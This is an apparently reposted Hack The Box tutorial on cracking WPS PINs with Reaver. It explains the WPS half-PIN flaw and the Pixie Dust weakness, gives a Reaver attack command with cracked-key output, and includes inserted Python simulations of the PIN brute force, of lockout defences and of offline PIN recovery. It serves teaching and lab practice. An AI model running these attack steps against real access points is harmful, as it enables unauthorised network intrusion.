WPS PIN attacks: How to crack WPS-enabled Wi-Fi networks with Reaver


Level up your Wi-Fi hacking! Understanding WPS and its older vulnerabilities is a good introduction to wireless network security and to how such flaws are detected, exploited, and mitigated.


Wi-Fi has become an essential network infrastructure in both homes and businesses due to the requirement to support mobile devices and network-connected smart devices. 

To simplify the connection of devices to a wireless network, the Wi-Fi Alliance introduced Wi-Fi Protected Setup (WPS) in 2006, which allowed the automated configuration of devices at the touch of a button or by entering a short PIN. 

However, in 2011 a major vulnerability was discovered in the WPS PIN method. The flaw was in the protocol design itself, and the access points of many manufacturers made it worse by not limiting failed PIN attempts.

Users at that time realized that the feature was often enabled by default and worse, was still vulnerable even when WPS was disabled in the management user interface.

The WPS vulnerabilities illustrate how difficult it is to get manufacturers of network devices to implement protocols fully and to add security measures, especially when those measures come at the cost of convenience and functionality.

In the case of WPS PIN brute force attacks, end users were left with little option in some cases other than to wait for firmware updates or to purchase new devices.

Although the original WPS PIN attack has been mitigated by updates, new wireless access points designed for the home or small office still support WPS through push-button configuration. That remains a weakness on any device an attacker can physically reach.

Understanding WPS and its older vulnerabilities is a good introduction to wireless network security and how to detect, exploit, and mitigate them in a live environment. 

Improve your wireless network security skills with Wifinetic

  • Improve your understanding of Wi-Fi network vulnerabilities.

  • Learn to brute force WPS PINs to obtain the pre-shared key (PSK).

  • Get familiar with tools like Reaver and Aircrack-ng.

We’ve introduced a new innovative machine, Wifinetic, that allows users to explore wireless network vulnerabilities to develop skills in searching for vulnerabilities such as those found in the WPS protocol. 

This would have normally required a hardware network setup in a lab but is delivered on the HTB platform through our virtualized environment.

What is WPS?

Wi-Fi Protected Setup (WPS), also referred to as Wi-Fi Simple Configuration (WSC), is a network standard and protocol that lets a device join a Wi-Fi network without the user typing in the network's passphrase: the protocol provisions the credentials to the device instead.

It is commonly used to attach smart devices such as TVs and printers to home Wi-Fi networks where inputting a complicated or long passphrase or key would be cumbersome. 

How does WPS work?

WPS calls the device wanting to connect to the network an “Enrollee” and the WPS logic that handles the authentication and configuration process the “Registrar”.  

An access point (AP) lets the enrollee and registrar communicate with each other. In most cases the AP and registrar functions are combined in one device, as in a typical wireless router.

Access points can also support “external registrars”. External registrars connect with the access point using the same message exchange as the wireless clients outlined below.

To connect a device via WPS, there are a few different modes of operation. The main two are:

Push Button Configuration (PBC): The enrollee device and the access point each have a button (physical or in software) that must be pressed to initiate and confirm a connection. Once the button on the access point is pressed, the AP accepts PBC enrollment for a walk time of at most two minutes.

The user then presses the button on the connecting device to join the access point. This mode assumes that an attacker does not have physical access to the router, a weakness discussed further below.

PIN Entry: A static eight-digit PIN is assigned to the access point, and a device must present it to be authenticated and join the Wi-Fi network. The PIN is often printed on a sticker on the access point and can sometimes be changed through the administration interface.

WPS carries its messages over IEEE 802.11 frames using the Extensible Authentication Protocol (EAP) for both discovery and configuration. The flow of messages between the user, enrollee, and registrar is split into a discovery phase and a registration phase.

The first two registration messages (M1 and M2) let the enrollee and registrar exchange Diffie-Hellman public keys, from which the keys protecting all subsequent messages are derived. What follows is a proof that both the enrollee and registrar know the same PIN. The PIN is split into two halves and each half is used as a separate secret: each side commits to a hash of each half, bound to a secret nonce, and later reveals the nonce to prove knowledge of that half. The PIN is eight digits long and the last digit is a checksum of the first seven.

  Digit:   1   2   3   4   5   6   7   8
           |-- 1st half --| |-- 2nd half --|
                               (digit 8 = checksum)

The enrollee and registrar can each tell whether the first or the second half of the PIN was wrong, because an incorrect proof for that half is answered with a negative acknowledgment (NACK) message.

For an attacker acting as the registrar, this means that a NACK in response to M4 shows the first half of the PIN is incorrect, and a NACK in response to M6 shows the second half is incorrect.

At the end of the process, the Wi-Fi password is shared with the enrollee, allowing it to join the network.  

The WPS PIN attack vulnerability
WPS PIN 攻击漏洞

Having seen how WPS uses the PIN, you may already have worked out that it is vulnerable to brute force. If WPS checked all seven free digits at once (the checksum digit is always calculable and can be ignored), there would be 10^7, or 10,000,000, possible PINs, making an over-the-air brute force attack impractical.

However, because each half of the PIN is checked independently, an attacker only needs to search the 10^4 (10,000) possible first halves and then the 10^3 (1,000) possible second halves: at most 11,000 attempts in total.
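The M3 to M7 exchange described above and the 10^4 + 10^3 bound, as an added Python simulation (not code from the original article or from Reaver). It follows the specification's hash constructions (PSK1 = first 128 bits of HMAC-SHA256(AuthKey, first half); E-Hash1 = HMAC-SHA256(AuthKey, E-S1 || PSK1 || PKE || PKR), and likewise for the second half), with two simplifying assumptions: AuthKey, PKE and PKR are fixed constants instead of being derived from the M1/M2 Diffie-Hellman exchange, and the EAP messages are Python method calls. The attacker plays the external registrar; the Enrollee class plays the access point.

```python
"""Simulation of the WPS PIN half-by-half check (M3..M7) and the brute-force bound.

Added example, not from the article or from Reaver. Assumptions: AuthKey, PKE
and PKR are fixed constants (the real values come from the M1/M2 Diffie-Hellman
exchange) and EAP messages are modelled as method calls.
"""
import hashlib
import hmac
import os
from typing import Optional, Tuple

# Constructed stand-ins for the per-session values normally derived from M1/M2.
AUTH_KEY = b"\x11" * 32
PKE = b"\xaa" * 192  # enrollee (AP) Diffie-Hellman public key
PKR = b"\xbb" * 192  # registrar (attacker) Diffie-Hellman public key


def wps_checksum(first7: str) -> int:
    """Return the 8th PIN digit: digits 1,3,5,7 weigh 3, digits 2,4,6 weigh 1."""
    acc = sum((3 if i % 2 == 0 else 1) * int(d) for i, d in enumerate(first7))
    return (10 - acc % 10) % 10


def psk_half(half: str) -> bytes:
    """PSK1/PSK2: first 128 bits of HMAC-SHA256(AuthKey, ASCII digits of the half)."""
    return hmac.new(AUTH_KEY, half.encode(), hashlib.sha256).digest()[:16]


def wps_hash(secret_nonce: bytes, psk: bytes) -> bytes:
    """E-Hash/R-Hash: HMAC-SHA256(AuthKey, S || PSK || PKE || PKR)."""
    return hmac.new(AUTH_KEY, secret_nonce + psk + PKE + PKR, hashlib.sha256).digest()


class Enrollee:
    """Access point acting as WPS enrollee towards an external registrar."""

    def __init__(self, pin: str, passphrase: str):
        assert len(pin) == 8 and wps_checksum(pin[:7]) == int(pin[7]), "bad PIN checksum"
        self.pin, self.passphrase = pin, passphrase
        self.e_s1, self.e_s2 = os.urandom(16), os.urandom(16)  # secret nonces

    def m3(self) -> Tuple[bytes, bytes]:
        """E-Hash1/E-Hash2: the AP's commitments to the two PIN halves."""
        return (wps_hash(self.e_s1, psk_half(self.pin[:4])),
                wps_hash(self.e_s2, psk_half(self.pin[4:])))

    def m4(self, r_hash1: bytes, r_s1: bytes) -> Optional[bytes]:
        """Check the proof of the first half: M5 (reveals E-S1) on success, NACK (None) otherwise."""
        if hmac.compare_digest(r_hash1, wps_hash(r_s1, psk_half(self.pin[:4]))):
            return self.e_s1
        return None

    def m6(self, r_hash2: bytes, r_s2: bytes) -> Optional[str]:
        """Check the proof of the second half: M7 (network credentials) on success, NACK otherwise."""
        if hmac.compare_digest(r_hash2, wps_hash(r_s2, psk_half(self.pin[4:]))):
            return self.passphrase
        return None


def brute_force_pin(ap: Enrollee) -> Tuple[str, str, int]:
    """Attacker as registrar: recover PIN and passphrase, counting M4/M6 round trips.

    Worst case is 10_000 + 1_000 = 11_000 attempts instead of 10_000_000, because the
    AP's NACK after M4 or M6 tells the attacker which half was wrong.
    """
    attempts = 0
    r_s1, r_s2 = os.urandom(16), os.urandom(16)
    e_hash1, _e_hash2 = ap.m3()
    for first in range(10_000):
        half1 = f"{first:04d}"
        attempts += 1
        e_s1 = ap.m4(wps_hash(r_s1, psk_half(half1)), r_s1)
        if e_s1 is not None:
            # M5 reveals E-S1, so the registrar can now verify the AP's own M3 commitment.
            assert wps_hash(e_s1, psk_half(half1)) == e_hash1
            break
    else:
        raise RuntimeError("first half not found")
    for second in range(1_000):
        half2 = f"{second:03d}"
        half2 += str(wps_checksum(half1 + half2))  # checksum is derived: only 1000 candidates
        attempts += 1
        passphrase = ap.m6(wps_hash(r_s2, psk_half(half2)), r_s2)
        if passphrase is not None:
            return half1 + half2, passphrase, attempts
    raise RuntimeError("second half not found")


if __name__ == "__main__":
    pin, psk, n = brute_force_pin(Enrollee("12345670", "Password123!"))
    print(f"PIN {pin}, PSK {psk!r}, recovered after {n} round trips (max 11000)")
```

Against the PIN 12345670 the search finishes after 1,803 round trips (1,235 for the first half, 568 for the second); no PIN takes more than 11,000. Note that M5 lets the registrar check the AP's E-Hash1 commitment locally once E-S1 is known, which is why predictable nonces are so damaging in the Pixie Dust attack the article mentions later.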

This vulnerability was published by Stefan Viehböck in 2011. He created a proof of concept (POC) to exploit this vulnerability and tested a number of wireless access points to demonstrate the flaw. 

In his POC, Viehböck used the registration protocol for enrolling an external registrar with the access point. If an access point was vulnerable, the PIN could typically be cracked within about four hours in the worst case (roughly half that on average).

Exploiting WPS in practice

The first phase of an attack on a Wi-Fi access point is discovering it. The best-known toolset for this is the Aircrack-ng suite, which includes airmon-ng for putting the wireless interface into monitor mode and airodump-ng for capturing and listing nearby networks.

To use this tool, you will need to have a wireless network interface on your computer and have it set in “monitor mode” in order to be able to do things like scan for other wireless networks or even examine network packets.

Assuming this is in place, the tool airodump-ng will provide a list of available networks and provide details of the network’s Basic Service Set Identifier (BSSID) and their descriptive names or Extended Service Set Identifier (ESSID). You will also get information about the channels they are operating on and the authentication and cipher protocols they may be using.

In a real engagement, you would need to determine which of these networks were of interest and then look at potential vulnerabilities for each target of interest. Since this article is concerned with WPS PIN attacks, we are going to focus on that.


💡Note: The retired HTB machine Olympus, which focuses on Docker, includes a short Wi-Fi section in which a captured Wi-Fi handshake is cracked offline with aircrack-ng.

Phase: Exploitation

Tactic: WPS PIN attack

Having scanned for Wi-Fi networks and found a potential target, we can switch to using a specific tool called Reaver that was created to brute force WPS PINs. Reaver uses the same approach as Stefan Viehböck’s POC. It uses IEEE 802.11/EAP to act as an external registrar authenticating with the target Wi-Fi access point.

To perform the attack, Reaver is pointed at the target's BSSID on its channel through the monitor-mode interface:

reaver -i <monitor interface> -b <BSSID> -c <channel number> -vv

The -vv flag increases the verbosity of the output.

With these arguments, you will be able to follow the progress in cracking the PIN and once successful, Reaver will print out details of the PIN and any WPA PSK password it has discovered.

[+] Pin cracked in 2 seconds
[+] WPS PIN: '12345670'
[+] WPA PSK: 'Password123!'

Once you have obtained the Wi-Fi key, you would use it to potentially join the network and enumerate the resources accessible by that network. You might also check if the password has been used for authenticating other accounts that are discovered during the penetration of the network and associated systems. 

Defense against WPS attacks

The current version of the Wi-Fi Simple Configuration specification (version 2.0.8) gives implementers specific requirements for protecting the PIN method against brute force attacks.

These include using dynamically generated, single-use PINs instead of a static device PIN, and introducing progressive delays in responding to requests that look like attempts to brute force the PIN. Another requirement is that the access point must enter a lock-down state after 10 failed PIN attempts from external registrars trying to authenticate.
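Added example (not from the article or from any vendor firmware): a small model of the two countermeasures just described, progressive delay and lockdown after 10 failures, run against the sequential first-half search. The 1.3 seconds per attempt is the average Viehböck measured against unprotected access points in 2011; the doubling delay schedule and the one-second base are assumed values, since the specification leaves the schedule to the implementer.

```python
"""WSC 2.0 brute-force countermeasures modelled as an AP-side policy object.

Added example, not from the article or any firmware. Assumptions: the delay
schedule (1 s, doubling per consecutive failure) is illustrative; the lockdown
after 10 failures is the specification's requirement; 1.3 s per attempt is the
average Viehböck measured against unprotected APs.
"""
import math
from dataclasses import dataclass
from typing import Tuple

MAX_ATTEMPTS = 10_000 + 1_000   # online search space after the half-split flaw
SECONDS_PER_ATTEMPT = 1.3       # measured average per M4/M6 round trip (Viehböck, 2011)


@dataclass
class WpsPinGuard:
    """Tracks failed external-registrar PIN attempts on the AP side."""
    max_failures: int = 10      # WSC 2.0: indefinite lockdown after 10 failures
    base_delay: float = 1.0     # seconds; assumed, doubles after each consecutive failure
    failures: int = 0
    locked: bool = False

    def on_attempt(self, correct: bool) -> float:
        """Return the delay (seconds) the AP imposes before answering the next attempt.

        A correct attempt resets the counter; the 10th consecutive failure locks WPS
        until an administrator resets it (modelled as an infinite delay).
        """
        if self.locked:
            return math.inf
        if correct:
            self.failures = 0
            return 0.0
        self.failures += 1
        if self.failures >= self.max_failures:
            self.locked = True
            return math.inf
        return self.base_delay * 2 ** (self.failures - 1)


def online_attack(guard: WpsPinGuard, first_half: int) -> Tuple[bool, int, float]:
    """Guess the first PIN half sequentially (0000, 0001, ...) against the guard.

    Returns (found, attempts_answered, seconds_spent); seconds_spent includes the
    progressive delays the AP imposed.
    """
    elapsed = 0.0
    for guess in range(10_000):
        if guard.locked:
            return False, guess, elapsed
        elapsed += SECONDS_PER_ATTEMPT          # one M4 round trip
        delay = guard.on_attempt(guess == first_half)
        if guess == first_half:
            return True, guess + 1, elapsed
        if not math.isinf(delay):
            elapsed += delay                    # AP stays silent before the next attempt
    return False, 10_000, elapsed


def unprotected_worst_case_hours() -> float:
    """Time to exhaust the 11,000-attempt space against an AP with no countermeasures."""
    return MAX_ATTEMPTS * SECONDS_PER_ATTEMPT / 3600


if __name__ == "__main__":
    print(f"unprotected worst case: {unprotected_worst_case_hours():.2f} h")
    print("with guard:", online_attack(WpsPinGuard(), first_half=1234))
```

Without a guard, 11,000 attempts at 1.3 s each come to just under four hours, which is the figure quoted earlier. With the guard, the attacker gets ten answers and is then locked out, with only a 10 in 10,000 chance of having hit the right first half before the lockdown.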

Updating firmware on devices to implement fixes or purchasing an access point that has implemented an up-to-date version of WPS is important. WPS is normally configurable from the administration function, so if not in use, it should be turned off. 

In the past, there were devices where even if WPS was disabled, the protocol could still be brute forced and so this should be checked in the particular models of devices. Since anyone with physical access to a device can simply push the WPS button to connect, physical access to access points should be controlled by putting them in locked cupboards or cages. 

Another vulnerability that we haven't discussed is the so-called Pixie Dust attack, published in 2014, which affects particular models of access points built on specific chipsets.

It stems from weaknesses in how those chipsets generated the enrollee's secret nonces (E-S1 and E-S2) used in the WPS registration exchange.

Because the nonces were predictable rather than random, an attacker who captured a single M3 message could compute the PIN offline, with no further attempts against the access point and therefore no lockout to stop it. Again, this issue has been fixed in more recent access point models.
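Added example, not from the article: the offline PIN search that Pixie Dust enables. It uses the specification's hash constructions with the simplifying assumption that AuthKey, PKE and PKR are fixed constants (the attacker, as registrar, knows the real values from the M1/M2 exchange), and models the vulnerable AP as using all-zero E-S1/E-S2, which some affected chipsets actually did; others derived the nonces from the clock or a weak generator, which the attacker enumerates the same way. Only the E-Hash1/E-Hash2 values from one captured M3 are needed.

```python
"""Offline PIN recovery from a single M3 when the AP's nonces are predictable.

Added example, not from the article. Assumptions: AuthKey, PKE and PKR are fixed
constants; the weak AP uses all-zero E-S1/E-S2 (a constructed stand-in for the
predictable nonces of affected chipsets).
"""
import hashlib
import hmac
from typing import Optional, Tuple

AUTH_KEY = b"\x11" * 32  # stand-in for the key derived from the M1/M2 DH exchange
PKE = b"\xaa" * 192
PKR = b"\xbb" * 192


def wps_checksum(first7: str) -> int:
    """8th PIN digit: weights 3,1,3,1,3,1,3 over the first seven digits."""
    acc = sum((3 if i % 2 == 0 else 1) * int(d) for i, d in enumerate(first7))
    return (10 - acc % 10) % 10


def psk_half(half: str) -> bytes:
    """PSK1/PSK2 = HMAC-SHA256(AuthKey, half)[:16]."""
    return hmac.new(AUTH_KEY, half.encode(), hashlib.sha256).digest()[:16]


def wps_hash(secret_nonce: bytes, psk: bytes) -> bytes:
    """E-Hash = HMAC-SHA256(AuthKey, E-S || PSK || PKE || PKR)."""
    return hmac.new(AUTH_KEY, secret_nonce + psk + PKE + PKR, hashlib.sha256).digest()


def weak_ap_m3(pin: str) -> Tuple[bytes, bytes]:
    """A vulnerable AP's M3: E-Hash1/E-Hash2 computed with predictable (here: zero) nonces."""
    e_s1 = e_s2 = bytes(16)  # the flaw: nonces the attacker can predict
    return wps_hash(e_s1, psk_half(pin[:4])), wps_hash(e_s2, psk_half(pin[4:]))


def pixie_dust_recover(e_hash1: bytes, e_hash2: bytes,
                       e_s1: bytes = bytes(16), e_s2: bytes = bytes(16)) -> Optional[str]:
    """Recover the full PIN from one M3 by local computation only.

    Both halves are searched independently (10_000 + 1_000 HMACs); no message is sent
    to the AP after M3, so per-attempt delays and lockdown cannot interfere.
    Returns None if the guessed nonces do not match (the AP was not vulnerable).
    """
    half1 = None
    for i in range(10_000):
        cand = f"{i:04d}"
        if wps_hash(e_s1, psk_half(cand)) == e_hash1:
            half1 = cand
            break
    if half1 is None:
        return None
    for j in range(1_000):
        half2 = f"{j:03d}"
        half2 += str(wps_checksum(half1 + half2))
        if wps_hash(e_s2, psk_half(half2)) == e_hash2:
            return half1 + half2
    return None


if __name__ == "__main__":
    h1, h2 = weak_ap_m3("12345670")          # captured from a single M3 (constructed)
    print("recovered PIN:", pixie_dust_recover(h1, h2))
```

The whole search is 11,000 HMAC computations and completes in well under a second on a laptop. When the nonce guess is wrong (the AP uses proper randomness), the first loop finds no match and the function returns None, which is exactly why fixed firmware defeats the attack.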

Develop your skills with HTB

Now that you have the theory and principles behind reconnaissance and enumeration of Wi-Fi networks, you can put it into practice using the Hack The Box machine Wifinetic.

What is special about this box is that it runs an emulated wireless access point serving a wireless network.

Wifinetic is an Easy difficulty Linux machine that focuses on wireless security. Initial enumeration reveals an exposed FTP service that has anonymous authentication enabled which allows you to download available files. One of the files is an OpenWRT backup. 

OpenWRT is an operating system designed for wireless access points and routers based on Linux. Enumeration of the backup reveals a wireless network configuration that discloses an Access Point password. The contents of shadow or passwd files further disclose usernames on the server. 

With this information, a password reuse attack can be carried out on the SSH service running on the Wifinetic machine, allowing us to gain a foothold as the netadmin user. Using a variety of tools, the wireless networks the machine has access to can be enumerated revealing the OpenWRT network. 

The Reaver utility is available on the machine and has been granted Linux capabilities on the wireless interface, so it can be run to reveal the WPS PIN and the WPA key. That key can then be reused to log in as root via SSH.



Original article by felamos: WPS PIN attacks: How to crack WPS-enabled Wi-Fi networks with Reaver

Copyright notice: posted by admin on 11 October 2023 at 20:57.
Please credit when reposting: WPS PIN attacks: How to crack WPS-enabled Wi-Fi networks with Reaver | CTF导航
